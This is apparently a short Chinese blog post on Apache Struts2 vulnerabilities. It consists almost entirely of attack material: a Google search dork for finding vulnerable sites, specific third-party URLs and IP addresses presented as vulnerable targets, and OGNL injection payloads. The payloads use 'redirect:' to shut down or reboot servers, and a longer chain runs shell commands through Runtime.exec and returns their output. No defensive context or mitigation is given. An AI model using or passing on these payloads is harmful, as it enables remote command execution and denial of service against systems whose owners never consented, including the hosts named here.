struts漏洞

原创

mb63e0703549da8 2023-07-17 15:59:30 博主文章分类：java ©著作权

©著作权归作者所有：来自51CTO博客作者mb63e0703549da8的原创作品，请联系作者获取转载授权，否则将追究法律责任

复制出来保存成记事本看

google搜索:
inurl:common/common_info.action?wid=

漏洞网站:
http://www.gzdfzw.cn/common/common_info.action?wid=201211200902001011
http://222.240.202.201/sdm/plat/login.action


?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-s','-t','1'})).start()}  

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'dir\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))


http://222.240.202.201/sdm/plat/login.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}
http://202.65.223.84/companySearchDetail.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}


?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}


http://localhost:8080/InfomactionPlatform_Test/saveBusiness?redirect:http://www.yahoo.com/